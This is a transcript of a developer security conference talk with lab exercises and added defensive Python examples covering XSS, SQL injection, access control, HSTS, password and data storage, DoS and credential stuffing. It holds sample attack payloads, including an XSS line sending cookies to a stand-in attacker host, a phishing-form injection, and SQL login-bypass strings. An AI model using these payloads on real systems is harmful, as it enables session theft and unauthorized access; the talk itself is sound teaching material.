Devbeat Conference - Developer First Security

Developer-first security: Integrating Security into Development. Michael Coates, [email protected], michael-coates.blogspot.com, @_mwc

Description

Topics include:
- Sample and Demo of Top Application Risks: Cross Site Scripting, SQL Injection, Access Control
- Who's Monitoring Your Traffic? Encrypting in Transit
- Secure Data Storage & Protection: Correct Password Storage & Data Protection
- Growing Threats Plaguing Applications

Transcript of Devbeat Conference - Developer First Security

Page 1: Devbeat Conference - Developer First Security

Developer-first security: Integrating Security into Development

Michael Coates

[email protected] michael-coates.blogspot.com

@_mwc

Page 2: Devbeat Conference - Developer First Security

About Me

[email protected]

Page 3: Devbeat Conference - Developer First Security

Reality

Page 4: Devbeat Conference - Developer First Security

“The global cost of cybercrime is greater than the combined effect on the global economy of trafficking in marijuana, heroin and cocaine”

http://www.theregister.co.uk/2011/09/07/cost_is_more_than_some_drug_trafficking
http://uk.norton.com/content/en/uk/home_homeoffice/html/cybercrimereport/

Page 5: Devbeat Conference - Developer First Security

Data Loss & Breaches

Verizon Data Breach Report 2013, datalossdb.org

Page 6: Devbeat Conference - Developer First Security

Outside Attackers

Verizon Data Breach Report 2013, datalossdb.org

Page 7: Devbeat Conference - Developer First Security

Security - Into The Details

• Sample and Demo of Top Application Risks: Cross Site Scripting, SQL Injection, Access Control

• Who's Monitoring Your Traffic? Encrypting in Transit

• Secure Data Storage & Protection: Correct Password Storage & Data Protection

• Growing Threats Plaguing Applications

Page 8: Devbeat Conference - Developer First Security

WARNING

Security Testing is

ILLEGAL ON UNAUTHORIZED SYSTEMS

Page 9: Devbeat Conference - Developer First Security

Cross Site Scripting SQL Injection Access Control

3 Dangerous Vulnerabilities

Page 10: Devbeat Conference - Developer First Security

What are Web Requests

• Open console & enter the following:

telnet google.com 80
GET / HTTP/1.1

• Hit return 2 times (the empty line marks the end of the request headers)

• Note: HTTP/1.1 requires a Host header; if the server answers 400 Bad Request, add a line Host: google.com before the blank line

Page 11: Devbeat Conference - Developer First Security

Cross Site Scripting (XSS)

• Problem: User controlled data returned in the HTTP response contains HTML/JavaScript code

• Impact: Session Hijacking, Full Control of Page, Malicious Redirects

• Basic XSS Test: "><script>alert(document.cookie)</script>

• Cookie Theft Example: "><script>document.location='http://attackersite/'+document.cookie</script>

Page 12: Devbeat Conference - Developer First Security

XSS Behind The Scenes

Request: http://shinypage.com?name=Bob

JSP Code: <h1>Glad to see you <%= request.getParameter("name") %></h1>

HTML Source: <div>Glad to see you <b>Bob</b></div>

Rendered HTML: Glad to see you Bob

Page 13: Devbeat Conference - Developer First Security

XSS Behind The Scenes

http://shinypage.com?name=friend</b><br><form method="post" action="badsite.com/login"> Login: <input type="text" name="username"><br> Password:<input type="password" name="password"><input type="submit" value="Submit" /></form>

Page 14: Devbeat Conference - Developer First Security

XSS - Injecting HTML

Rendered HTML

Page 15: Devbeat Conference - Developer First Security

Cross Site Scripting

• Cross Site Scripting typically uses JavaScript to do bad things

• Steal session cookies: <script>alert(document.cookie)</script>

• Redirect to bad pages: <script>window.location = "http://evilsite.com/"</script>

• Rewrite page on the fly

Page 16: Devbeat Conference - Developer First Security

Lab! - Reflected XSS

Page 17: Devbeat Conference - Developer First Security

Reflected XSS Lab

• Lesson: Cross-Site Scripting -> Reflected XSS Attacks

• Proxy Not Needed

Page 18: Devbeat Conference - Developer First Security

Lab! - Stored XSS

Page 19: Devbeat Conference - Developer First Security

Stored XSS Lab

• Lesson: Cross-Site Scripting -> Stored XSS Attacks

• Proxy Not Needed

Page 20: Devbeat Conference - Developer First Security

XSS Prevention

• Solution

1. Output Encoding - converts command characters to benign characters for display

2. Input Validation

HTML Encoding:

<  ->  &lt;
>  ->  &gt;
"  ->  &quot;
'  ->  &#x27;
&  ->  &amp;

<h1>Glad to see you <%=encodeForHTML( request.getParameter("name") ) %></h1>
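As an added example (not code from the talk), the JSP line above modelled in Python: html.escape(quote=True) stands in for encodeForHTML() and encodes exactly the five characters in the table. The <h1>/<b> wrapper, the `name` parameter and the two payloads from the earlier slides are the assumed template and inputs; injected_tags() is the check that the encoded render contributes no markup of its own.

```python
from __future__ import annotations

import html
import re

# Payloads taken from the earlier slides (constructed inputs for the demo).
BASIC_XSS_TEST = '"><script>alert(document.cookie)</script>'
FORM_INJECTION = ('friend</b><br><form method="post" action="badsite.com/login">'
                  ' Login: <input type="text" name="username"><br>'
                  ' Password:<input type="password" name="password">'
                  '<input type="submit" value="Submit" /></form>')

TAG = re.compile(r"<[^>]+>")


def render_vulnerable(name: str) -> str:
    """Equivalent of <h1>Glad to see you <%= request.getParameter("name") %></h1>
    with the <b> wrapper from the HTML source slide: the parameter is pasted in verbatim."""
    return f"<h1>Glad to see you <b>{name}</b></h1>"


def encode_for_html(value: str) -> str:
    """Stand-in for the slides' encodeForHTML(): maps < > " ' & to their entities.
    html.escape(quote=True) encodes exactly those five characters, nothing else."""
    return html.escape(value, quote=True)


def render_safe(name: str) -> str:
    """Equivalent of <h1>Glad to see you <%= encodeForHTML(request.getParameter("name")) %></h1>."""
    return f"<h1>Glad to see you <b>{encode_for_html(name)}</b></h1>"


def injected_tags(page: str) -> list[str]:
    """Tags present in the page beyond the template's own <h1>/<b> wrapper.
    A safe render must return an empty list for any input."""
    template_tags = {"<h1>", "</h1>", "<b>", "</b>"}
    return [t for t in TAG.findall(page) if t not in template_tags]


if __name__ == "__main__":
    for payload in (BASIC_XSS_TEST, FORM_INJECTION):
        print("vulnerable:", injected_tags(render_vulnerable(payload)))
        print("safe      :", injected_tags(render_safe(payload)))
```

Entity encoding is the right encoder only for the HTML body context shown here; data placed inside an attribute value, a script block or a URL needs the context-specific encoder from the OWASP cheat sheet linked below, and the Content Security Policy header listed there limits what an injected script can do if an encoder is missed.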

Page 21: Devbeat Conference - Developer First Security

XSS Attempt Revisited

http://shinypage.com?name=friend</b><br><form method="post" action="badsite.com/login"> Login: <input type="text" name="username"><br> Password:<input type="password" name="password"><input type="submit" value="Submit" /></form>

Page 22: Devbeat Conference - Developer First Security

Safe Handling

Glad to see you friend</b> <br><form method="post" action="badsite.com/

login"> Login: <input type="text" name="username"><br>

Password:<input type="password" name="password"><input type="submit" value="Submit" /></form>

Rendered HTML

Page 23: Devbeat Conference - Developer First Security

XSS Resources

• OWASP XSS Prevention Cheat Sheet - http://bit.ly/XSS-OWASP

• Content Security Policy - http://bit.ly/CSP-OWASP

• OWASP XSS Overview - http://bit.ly/OWASPXSS

Page 24: Devbeat Conference - Developer First Security

SQL Injection

• Problem: User controlled data improperly used with SQL statements

• Impact: Arbitrary SQL Execution, Data Corruption, Data Theft

• Basic SQL Injection Tests: ' OR 1=1 --   and   ' OR '1'='1' --

• Example Vulnerable Query: sqlQ = "Select user from UserTable where name= '" + username + "' and pass = '" + password + "'"

Page 25: Devbeat Conference - Developer First Security

Lab! - SQL Lesson

Page 26: Devbeat Conference - Developer First Security

SQL Injection

• Lesson: Injection Flaws -> Lab: SQL Injection -> Stage 1: String SQL Injection

• Proxy Needed

• Objective: Bypass the login page by inserting "control" characters. Login as "Neville" w/o knowledge of the password

Page 27: Devbeat Conference - Developer First Security

SQL Injection

• HTTP Post: employee_id=112&password=x' OR '1'='1&action=Login

• Vulnerable SQL: "Select user from UserTable where name= '" + username + "' and pass = '" + password + "'"

• Resulting Statement: Select user from UserTable where name= '112' and pass = 'x' OR '1'='1'

• Result: ... name = '112' and pass = 'x' OR TRUE (AND binds tighter than OR, so the condition is true for every row)

Page 28: Devbeat Conference - Developer First Security

SQL Injection

• Parameterized Queries: no confusion with control characters. Example: the query would look for a password of ' or '1'='1 (the literal string, not SQL)

• Input Validation: Are special characters needed for most fields? What about non-printable characters %00-%0A?
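Added example, not code from the talk or from WebGoat: the slide's concatenated query and its parameterized form run against an in-memory SQLite table with constructed rows (Neville's password is made up). sqlite3's `?` placeholders stand in for a JDBC PreparedStatement; the numeric allow-list for employee_id is the input-validation layer from the second bullet. Passwords are stored in clear here only to keep the injection visible; the Password Storage section covers how they should be stored.

```python
import re
import sqlite3

# Constructed rows for the demo; the passwords are made up and not known to the "attacker".
USERS = [("Neville", "s3cret-not-known"), ("112", "another-secret")]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE UserTable (user TEXT, name TEXT, pass TEXT)")
    conn.executemany("INSERT INTO UserTable VALUES (?, ?, ?)",
                     [(n, n, p) for n, p in USERS])
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """The slide's query built by string concatenation: the input becomes SQL text."""
    sql = ("Select user from UserTable where name= '" + username +
           "' and pass = '" + password + "'")
    return conn.execute(sql).fetchone()


def login_parameterized(conn: sqlite3.Connection, username: str, password: str):
    """Same query with bind parameters: the statement text is fixed and the values travel
    separately, so a quote in the input is compared as a quote, never parsed as SQL."""
    sql = "Select user from UserTable where name = ? and pass = ?"
    return conn.execute(sql, (username, password)).fetchone()


EMPLOYEE_ID = re.compile(r"[0-9]{1,10}")


def valid_employee_id(value: str) -> bool:
    """Allow-list validation for a numeric field (defence in depth, not a substitute for
    parameterization). fullmatch also rejects the non-printables %00-%0A the slide mentions."""
    return EMPLOYEE_ID.fullmatch(value) is not None


if __name__ == "__main__":
    db = make_db()
    payload = "x' OR '1'='1"          # the lab's password field, from the slide
    print("vulnerable   :", login_vulnerable(db, "112", payload))      # ('Neville',)
    print("parameterized:", login_parameterized(db, "112", payload))   # None
```

The vulnerable function logs in as the first row of the table, which is exactly the lab's "login as Neville without the password"; the parameterized one finds no row because it looks for a password that literally contains the quotes.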

Page 29: Devbeat Conference - Developer First Security

SQL Injection Resources

• https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet

Page 30: Devbeat Conference - Developer First Security

Access Control

• Problem: Developers assume some parts of app can't be seen, tampered with or invoked by the user

• Impact: Unauthorized data access, access to privileged functionality

• Basic Access Control Test: Inspect HTTP requests - iterate numbers, guess other values for arguments

• Access Control Failure Example:

• http://somebadbank.com/showacct?id=101

• http://somebadbank.com/showacct?id=102

Page 31: Devbeat Conference - Developer First Security

Lab! - Access Control

Page 32: Devbeat Conference - Developer First Security

Access Control Violation

• Lesson: Access Control Flaws -> LAB: Role Based Access Control -> Stage 1: Bypass Business Layer Access Control

• Proxy Needed

• Objective: Find way to execute "delete" functionality using Tom's account. Delete account "tom"

Page 33: Devbeat Conference - Developer First Security

Access Control Violation

• Hint: Login with Tom and perform available actions (search staff, view profile). Figure out how action name is sent to server

POST /webgoat/attack?Screen=43&menu=200 HTTP/1.1
Host: localhost

employee_id=105&action=ViewProfile

Page 34: Devbeat Conference - Developer First Security

Strong Access Controls

• Access Control Performed Server Side

• Never Relies Upon “Security by Obscurity”

• Be Careful with Identifiers (e.g. id=123)

• Attacker Can Send Anything in Request

• Presentation Layer Controls Can Not Enforce Access Control
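Added example with constructed data, not the lab's code or data: what the bullets above look like on the server. ACCOUNTS, ROLES and ACTION_ROLE are assumed tables; `tom` is an ordinary user as in the lab and `jerry` an assumed admin. probe() replays the slide's id-iteration test against a server that checks ownership, and is_allowed() shows the action name from the request body being mapped to a required role rather than trusted.

```python
from __future__ import annotations

# Constructed sample data: accounts by id with their owner, and the roles each login holds.
ACCOUNTS = {101: {"owner": "alice", "balance": 500}, 102: {"owner": "tom", "balance": 900}}
ROLES = {"alice": {"user"}, "tom": {"user"}, "jerry": {"user", "admin"}}

# Each server-side action and the role it requires. The action name arrives in the request
# body (employee_id=105&action=ViewProfile in the lab), so it is attacker-controlled.
ACTION_ROLE = {"ViewProfile": "user", "SearchStaff": "user", "DeleteProfile": "admin"}


class Forbidden(Exception):
    pass


def show_account(session_user: str, account_id: int) -> dict:
    """GET /showacct?id=<account_id>: the id is a guessable number, so ownership is checked
    against the authenticated session, never against anything carried in the request."""
    account = ACCOUNTS.get(account_id)
    if account is None or account["owner"] != session_user:
        # Identical failure for "not yours" and "does not exist": no id-enumeration oracle.
        raise Forbidden("account not available")
    return account


def dispatch(session_user: str, action: str) -> str:
    """POST ...&action=<name>: every action is mapped to a required role on the server.
    Hiding the Delete button in the UI is a presentation-layer control and proves nothing."""
    required = ACTION_ROLE.get(action)
    if required is None:
        raise Forbidden("unknown action")          # deny by default, never guess
    if required not in ROLES.get(session_user, set()):
        raise Forbidden("insufficient role")
    return f"{action} executed for {session_user}"


def is_allowed(session_user: str, action: str) -> bool:
    try:
        dispatch(session_user, action)
        return True
    except Forbidden:
        return False


def probe(session_user: str, ids) -> list:
    """The slide's basic test, run against this server: iterate ids and report which ones
    the session can actually read. A correct server returns only the caller's own."""
    readable = []
    for i in ids:
        try:
            show_account(session_user, i)
            readable.append(i)
        except Forbidden:
            pass
    return readable


if __name__ == "__main__":
    print("alice can read:", probe("alice", range(100, 105)))   # [101]
    print("tom may delete:", is_allowed("tom", "DeleteProfile"))  # False
```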

Page 35: Devbeat Conference - Developer First Security

Access Control Resources

• https://www.owasp.org/index.php/Access_Control_Cheat_Sheet

Page 36: Devbeat Conference - Developer First Security

Who’s Monitoring Your Traffic?

Page 37: Devbeat Conference - Developer First Security

Insecure Session Management

• Secure login over HTTPS: https://site.com/login

• Password submitted encrypted

• Immediate redirect to HTTP: http://site.com/profile

• Session ID sent cleartext <-- vulnerability point

Page 38: Devbeat Conference - Developer First Security

Vulnerable Redirects

• User requests HTTP page, response redirects to HTTPS

• 302 Response is HTTP <-- Vulnerability Point

Page 39: Devbeat Conference - Developer First Security

Secure Design for Communication

• Use HTTPS Throughout Web Site

• HTTP Strict Transport Security (HSTS)

  • Opt-in security control

  • Website instructs compatible browser to enable STS for site

• HSTS Forces (for enabled site):

  • All communication over HTTPS

  • No insecure HTTP requests sent from browser

  • No option for user to override untrusted certificates

Page 40: Devbeat Conference - Developer First Security

Strict Transport Security

• Browser prevents HTTP requests to HSTS site

• Any request to site is "upgraded" to HTTPS

• No clear text HTTP traffic ever sent to HSTS site

• Browser assumes HTTPS for HSTS sites
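Added example, not code from the talk: a model of both sides of the HSTS behaviour described on the last two slides. server_response() is an assumed server that never serves content over plain HTTP (it only redirects) and sends Strict-Transport-Security plus a Secure, HttpOnly session cookie on HTTPS; Browser is a minimal HSTS store and cookie jar that upgrades requests before they leave. The one-year max-age and the cookie name are assumed policy values.

```python
from urllib.parse import urlsplit, urlunsplit

HSTS_MAX_AGE = 31536000  # one year in seconds (assumed policy value)


def server_response(url: str, session_id: str) -> dict:
    """Constructed server behaviour: plain HTTP gets a redirect and nothing else."""
    parts = urlsplit(url)
    if parts.scheme == "http":
        # This redirect is itself a cleartext exchange: the slide's "response is HTTP"
        # vulnerability point. HSTS removes it for every visit after the first.
        return {"status": 301,
                "headers": {"Location": urlunsplit(("https",) + parts[1:])}}
    return {"status": 200,
            "headers": {
                # Browsers ignore this header on non-HTTPS responses, so it is only set here.
                "Strict-Transport-Security": f"max-age={HSTS_MAX_AGE}; includeSubDomains",
                # Secure: the cookie is never attached to a cleartext request (the fix for
                # "session ID sent cleartext" even where a stray http:// link survives).
                "Set-Cookie": f"JSESSIONID={session_id}; Secure; HttpOnly; Path=/",
            }}


class Browser:
    """Minimal model of a browser's HSTS store and cookie jar (constructed for the demo)."""

    def __init__(self):
        self.hsts_hosts = set()
        self.cookies = {}

    def outgoing_url(self, url: str) -> str:
        """The URL that actually leaves the browser: upgraded if the host is in the store."""
        parts = urlsplit(url)
        if parts.scheme == "http" and parts.hostname in self.hsts_hosts:
            return urlunsplit(("https",) + parts[1:])
        return url

    def cookies_for(self, url: str) -> list:
        scheme = urlsplit(url).scheme
        return [name for name, c in self.cookies.items()
                if scheme == "https" or not c["secure"]]

    def visit(self, url: str) -> tuple:
        """Send the request (upgraded if HSTS applies) and record policy from the response."""
        url = self.outgoing_url(url)
        resp = server_response(url, session_id="abc123")
        parts = urlsplit(url)
        if parts.scheme == "https" and "Strict-Transport-Security" in resp["headers"]:
            self.hsts_hosts.add(parts.hostname)
        if "Set-Cookie" in resp["headers"]:
            name, rest = resp["headers"]["Set-Cookie"].split("=", 1)
            self.cookies[name] = {"secure": "Secure" in rest.split("; ")}
        return url, resp["status"]
```

The first visit over http:// still goes out in clear and only receives the redirect; the policy is learned from the HTTPS response, and from then on the browser rewrites http://site.com/profile to https:// before any packet is sent, so no cleartext request and no cookie ever leave.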

Page 41: Devbeat Conference - Developer First Security

Secure Data Storage & Protection

Page 42: Devbeat Conference - Developer First Security

Password Storage

Bad Approaches

• Your own algorithm

• md5

• sha1

• encryption

• base64 encoding

• rot 13

Good Approach

• Bcrypt

• PBKDF2

+ Per User Salt

Page 43: Devbeat Conference - Developer First Security

What Are We Protecting?

Correct password hashing protects against:

• Offline attacks of password repository

• Brute Force, Rainbow Attacks

Does not address:

• Guessing easy passwords

• Password theft, disclosure

• Session Hijacking

• Credential Stuffing

Page 44: Devbeat Conference - Developer First Security

Architecture for Sensitive Data

[Diagram] Browser --(https://site.com)--> web server --(internal SSL)--> database

Monitor Database Queries & Response Size

Page 45: Devbeat Conference - Developer First Security

Encrypting Sensitive Data in Database

[Diagram] User Data is encrypted and decrypted with a Customer/Group Encryption Key; the database stores only Encrypted [Customer/Group Encryption Key], which is decrypted with a Key Encrypting Key held in a Hardware Security Module

• Encryption within Database

• Unique keys per data region

• Key encrypting keys

• Hardware Security Modules (HSM)
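Added example, not code from the talk: the key hierarchy from this slide (a data key per customer or group, stored only wrapped under a key-encrypting key that lives inside an HSM) in Python. The standard library has no AES, so seal()/open_() use HMAC-SHA256 in counter mode with an encrypt-then-MAC tag as a stand-in for a real AEAD such as AES-GCM, and Hsm is an in-process stand-in for the hardware module; both are assumptions of this example, not recommended production primitives. rotate_kek() shows the payoff of the hierarchy: rotating the master key re-wraps a few small keys and leaves the bulk data alone.

```python
import hashlib
import hmac
import os
import secrets


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """PRF in counter mode: concatenated HMAC-SHA256(key, nonce || counter) blocks."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def _subkeys(key: bytes):
    # Separate encryption and MAC keys derived from one 32-byte key.
    return (hmac.new(key, b"enc", hashlib.sha256).digest(),
            hmac.new(key, b"mac", hashlib.sha256).digest())


def seal(key: bytes, plaintext: bytes) -> bytes:
    """Encrypt-then-MAC with a fresh nonce: returns nonce || ciphertext || tag."""
    enc_key, mac_key = _subkeys(key)
    nonce = os.urandom(16)
    ct = bytes(p ^ k for p, k in zip(plaintext, _keystream(enc_key, nonce, len(plaintext))))
    tag = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag


def open_(key: bytes, blob: bytes) -> bytes:
    """Verifies the tag before touching the ciphertext; wrong key or any edit -> ValueError."""
    enc_key, mac_key = _subkeys(key)
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()):
        raise ValueError("authentication failed")
    return bytes(c ^ k for c, k in zip(ct, _keystream(enc_key, nonce, len(ct))))


class Hsm:
    """Stand-in for the Hardware Security Module: the key-encrypting key (KEK) is created
    inside and never returned; callers only get wrap/unwrap of data keys."""

    def __init__(self):
        self._kek = secrets.token_bytes(32)

    def wrap(self, dek: bytes) -> bytes:
        return seal(self._kek, dek)

    def unwrap(self, wrapped: bytes) -> bytes:
        return open_(self._kek, wrapped)


class Database:
    """Per customer/group: one data-encrypting key (DEK) held only in wrapped form, and user
    data encrypted under that DEK (unique keys per data region)."""

    def __init__(self, hsm: Hsm):
        self.hsm = hsm
        self.wrapped_deks = {}   # customer -> Encrypted[Customer/Group Encryption Key]
        self.rows = {}           # (customer, field) -> ciphertext

    def _dek(self, customer: str) -> bytes:
        if customer not in self.wrapped_deks:
            self.wrapped_deks[customer] = self.hsm.wrap(secrets.token_bytes(32))
        return self.hsm.unwrap(self.wrapped_deks[customer])

    def store(self, customer: str, field: str, value: str) -> None:
        self.rows[(customer, field)] = seal(self._dek(customer), value.encode())

    def load(self, customer: str, field: str) -> str:
        return open_(self._dek(customer), self.rows[(customer, field)]).decode()

    def rotate_kek(self, new_hsm: Hsm) -> None:
        """Rotating the KEK re-wraps only the small DEKs; bulk user data is untouched."""
        for customer in list(self.wrapped_deks):
            self.wrapped_deks[customer] = new_hsm.wrap(self.hsm.unwrap(self.wrapped_deks[customer]))
        self.hsm = new_hsm


def tampered_is_rejected(key: bytes, blob: bytes) -> bool:
    """Check: flipping one ciphertext byte must fail authentication rather than decrypt to
    garbage (the blob needs at least 5 bytes of ciphertext for index 20 to be data)."""
    damaged = bytearray(blob)
    damaged[20] ^= 0x01
    try:
        open_(key, bytes(damaged))
        return False
    except ValueError:
        return True
```

Two consequences of the layout are visible in the checks: the same value stored for two customers yields unrelated ciphertexts, and a database dump without the HSM yields only wrapped keys and ciphertext. The tag check is what makes the "Decrypt" arrow safe; without it a modified row decrypts silently to garbage.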

Page 46: Devbeat Conference - Developer First Security

Growing Threats Plaguing Applications

Page 47: Devbeat Conference - Developer First Security

Denial of Service

• Denial of Service (DOS)

• Distributed Denial of Service (DDOS)

Page 48: Devbeat Conference - Developer First Security

Denial of Service

[Diagram] Network DDOS: Exhaust Network Bandwidth

[Diagram] Application Layer DDOS: repeated requests to site.com/generateReport Exhaust Server CPU/Memory

Page 49: Devbeat Conference - Developer First Security

Application Denial of Service

Traditional Network DDOS

• overwhelms target with volume

• exhausts bandwidth / capacity of network devices

• Requires large number of machines

• Defenses: CDN, anti-DDOS services

Application DDOS

• invokes computationally intense application functions

• exhausts CPU / memory of web servers

• Requires few machines

• Defenses: Few available, must customize
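Added example, not code from the talk: one of the "customized" defences the slide says application-layer DDOS needs, a per-client cost budget placed in front of expensive handlers such as the /generateReport endpoint from the earlier diagram. Endpoint costs, bucket capacity, refill rate and the concurrency cap are assumed numbers; the clock is injectable so the behaviour can be checked without sleeping.

```python
import time
from collections import defaultdict

# Assumed per-endpoint costs: the report generator is charged far more than a page view.
ENDPOINT_COST = {"/generateReport": 50, "/search": 5, "/": 1}
EXPENSIVE = 50                # cost at or above which a request counts as "expensive"
BUDGET_CAPACITY = 100.0       # tokens a client may accumulate
REFILL_PER_SECOND = 10.0      # tokens restored per second of wall-clock time
MAX_INFLIGHT_EXPENSIVE = 2    # concurrent expensive requests allowed per client


class CostBudget:
    """Token bucket keyed by client (authenticated user where possible, else IP),
    charged per endpoint cost, plus a concurrency cap on expensive handlers."""

    def __init__(self, clock=time.monotonic):
        self.clock = clock
        self.tokens = defaultdict(lambda: BUDGET_CAPACITY)
        self.last = {}
        self.inflight = defaultdict(int)

    def _refill(self, client: str) -> None:
        now = self.clock()
        elapsed = now - self.last.get(client, now)
        self.tokens[client] = min(BUDGET_CAPACITY,
                                  self.tokens[client] + elapsed * REFILL_PER_SECOND)
        self.last[client] = now

    def admit(self, client: str, path: str) -> bool:
        """Decide before doing any work: True = run the handler, False = answer 429."""
        cost = ENDPOINT_COST.get(path, 1)
        self._refill(client)
        if cost >= EXPENSIVE and self.inflight[client] >= MAX_INFLIGHT_EXPENSIVE:
            return False
        if self.tokens[client] < cost:
            return False
        self.tokens[client] -= cost
        if cost >= EXPENSIVE:
            self.inflight[client] += 1
        return True

    def finished(self, client: str, path: str) -> None:
        """Release the concurrency slot when the handler ends, on success or on error."""
        if ENDPOINT_COST.get(path, 1) >= EXPENSIVE:
            self.inflight[client] = max(0, self.inflight[client] - 1)


if __name__ == "__main__":
    budget = CostBudget()
    for i in range(4):
        print("request", i, "admitted:", budget.admit("203.0.113.7", "/generateReport"))
```

The decision runs before the expensive work, which is the whole point: the few machines an application-layer attacker needs are stopped at the cheap check rather than inside the report code. Keying by IP alone is weak when many users sit behind one NAT, so key by authenticated identity wherever the endpoint requires a login, and still bound the handler's own work (page size, timeouts) for the unauthenticated case.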

Page 50: Devbeat Conference - Developer First Security

Credential Stuffing

[Diagram] A compromised server leaks Stolen Credentials (joe: abc123, sue: password1, bob: MyP0n3y); the attacker replays each pair (joe: abc123, sue: password1, ...) against https://site.com/login, where the same Credentials are reused
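Added example, not code from the talk: detection logic for the attack in the diagram, run over constructed login log lines (the usernames joe, sue and bob come from the slide; the IPs, timestamps, line format and thresholds are made up). The signature is one source trying many distinct accounts inside a short window with mostly failures; the accounts that did succeed from such a source are the ones to reset, since hashing (previous section) does nothing against a correct, reused password.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE = re.compile(r"^(?P<ts>\S+) ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>ok|fail)$")

# Constructed log lines: one legitimate user mistyping once, and one IP replaying a
# stolen credential list against /login.
SAMPLE_LOG = """\
2013-10-02T10:00:01Z ip=198.51.100.4 user=alice result=fail
2013-10-02T10:00:09Z ip=198.51.100.4 user=alice result=ok
2013-10-02T10:01:00Z ip=203.0.113.7 user=joe result=ok
2013-10-02T10:01:01Z ip=203.0.113.7 user=sue result=fail
2013-10-02T10:01:02Z ip=203.0.113.7 user=bob result=fail
2013-10-02T10:01:03Z ip=203.0.113.7 user=carol result=fail
2013-10-02T10:01:04Z ip=203.0.113.7 user=dave result=fail
2013-10-02T10:01:05Z ip=203.0.113.7 user=erin result=ok
"""

WINDOW = timedelta(minutes=10)
MIN_DISTINCT_USERS = 5     # assumed threshold: one client trying this many accounts
MIN_FAIL_RATIO = 0.5       # assumed: stolen lists mostly miss on a second site


def parse(log: str):
    """Yields (timestamp, ip, user, result) per well-formed line."""
    for line in log.splitlines():
        m = LINE.match(line)
        if not m:
            continue   # malformed line: skipped here, but a real pipeline should count these
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        yield ts, m["ip"], m["user"], m["result"]


def find_stuffing(log: str) -> dict:
    """Returns {ip: {"users": n, "fail_ratio": r, "compromised": [users]}} for each source
    that tried at least MIN_DISTINCT_USERS accounts within WINDOW with a failure ratio of
    at least MIN_FAIL_RATIO. "compromised" lists the accounts that succeeded from it."""
    events = defaultdict(list)
    for ts, ip, user, result in parse(log):
        events[ip].append((ts, user, result))
    flagged = {}
    for ip, evs in events.items():
        evs.sort()
        for i, (start, _, _) in enumerate(evs):
            window = [e for e in evs[i:] if e[0] - start <= WINDOW]
            users = {u for _, u, _ in window}
            fails = sum(1 for _, _, r in window if r == "fail")
            if len(users) >= MIN_DISTINCT_USERS and fails / len(window) >= MIN_FAIL_RATIO:
                flagged[ip] = {"users": len(users),
                               "fail_ratio": fails / len(window),
                               "compromised": sorted(u for _, u, r in window if r == "ok")}
                break
    return flagged


if __name__ == "__main__":
    for ip, info in find_stuffing(SAMPLE_LOG).items():
        print(ip, info)
```

A mistyped password from one user never trips this (one username, two attempts), while the replay source is flagged on its distinct-username count, and the two accounts that authenticated from it (joe and erin) come out as the follow-up list for forced resets. Attackers who spread the list across many IPs defeat a per-IP view, so the same counts are worth keeping per username (many sources, one account) and globally (failure rate across the site).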

Page 51: Devbeat Conference - Developer First Security

Take Aways

• Understand top security threats and anticipate potential malicious use of application to design secure code

• Multiple controls possible to protect sensitive data in transit and storage

• Understand emerging threats to plan for appropriate defenses

• Use OWASP BWA Security Lab and learn more!

Page 52: Devbeat Conference - Developer First Security

Thanks!

[email protected]

http://michael-coates.blogspot.com

@_mwc

Page 53: Devbeat Conference - Developer First Security

Virtual Security Training Lab Setup

Page 54: Devbeat Conference - Developer First Security

Software

• Vulnerable Server: OWASP’s Webgoat

• Proxy Tool - OWASP’s ZAP (Zed Attack Proxy)

• Browser

• Virtual Machine: OWASP Broken Web App VM

Page 55: Devbeat Conference - Developer First Security

Test Connectivity to VM

1. Open Browser

2. Browse to your VM ip (listed in VM login page)

• e.g. http://192.168.56.101

3. Should see OWASP BWA welcome page

4. Error? Check ip address of VM

Page 56: Devbeat Conference - Developer First Security

WebGoat

• Click First Link - OWASP WebGoat version 5.3.x

• Username / Password is guest / guest

Page 57: Devbeat Conference - Developer First Security

Understanding the Proxy

• Proxy is middle-man between browser and web server

• Assists with traffic manipulation & inspection

[Diagram] Attacker's Browser <-> Web Proxy <-> Web Server

Page 58: Devbeat Conference - Developer First Security

Understanding the Proxy

[Diagram] Your Computer (Primary OS): Browser <-> Web Proxy; VM: Web Server

Page 59: Devbeat Conference - Developer First Security

Enabling Proxy

1.Open ZAP

2.Configure Firefox to use proxy

3.Resend Request

4.Confirm received by proxy

5.Forward to web server (vm)

Page 60: Devbeat Conference - Developer First Security

Using A Proxy

• ZAP - Configure to listen on 8080

Page 61: Devbeat Conference - Developer First Security

Set Firefox Proxy

• Set Firefox proxy to 8080

• Preferences -> Advanced -> Network -> Settings

• Set HTTP Proxy

• Important - clear “No Proxy for” line

Page 62: Devbeat Conference - Developer First Security

Confirm Setup Works

• Refresh Web Browser

• Go to ZAP

• See site in left-hand column

Page 63: Devbeat Conference - Developer First Security

Intercepting Traffic

• Add a "breakpoint" by right clicking on the page and choosing "Break..."

• Refresh the webpage - it will hang

• Modify the request as needed, then press the "Continue" button

Page 64: Devbeat Conference - Developer First Security

"Hello World" of Proxies

• Lesson: General -> Http Basics

• Objective:

• Enter your name into text box

• Intercept with proxy & change entered name to different value

• Receive response & observe modified value is reversed

[Diagram] Attacker's Browser sends "Joe" -> Web Proxy changes it to "Sue" -> Web Server reverses it and returns "euS" -> the browser displays "euS"